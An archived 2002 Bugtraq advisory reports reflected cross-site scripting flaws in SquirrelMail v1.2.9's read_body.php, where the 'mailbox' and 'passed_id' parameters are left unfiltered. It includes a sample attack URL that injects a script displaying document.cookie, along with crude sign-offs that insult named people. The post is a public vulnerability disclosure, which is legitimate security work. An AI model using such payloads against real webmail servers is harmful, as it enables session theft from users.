85919 2002-12-03  20:12  /46 rader/ euronymous <just-a-user@yandex.ru>
Importerad: 2002-12-03  20:12  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern mottagare: vulnwatch@vulnwatch.org
Externa svar till: just-a-user@yandex.ru
Mottagare: Bugtraq (import) <2629>
Ärende: SquirrelMail v1.2.9 XSS bugs
------------------------------------------------------------
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt 
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
	      
description
-----------
when reading some email you can to insert the scripting code..
read_body.php dont make filtering users input in `mailbox' and
`passed_id' variables. btw, today has released v1.2.10. im dont
know if this version contains this xss.

sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

not URL-encoded string working fine also.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all 
russian security guyz!! 
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================
(85919) /euronymous <just-a-user@yandex.ru>/--------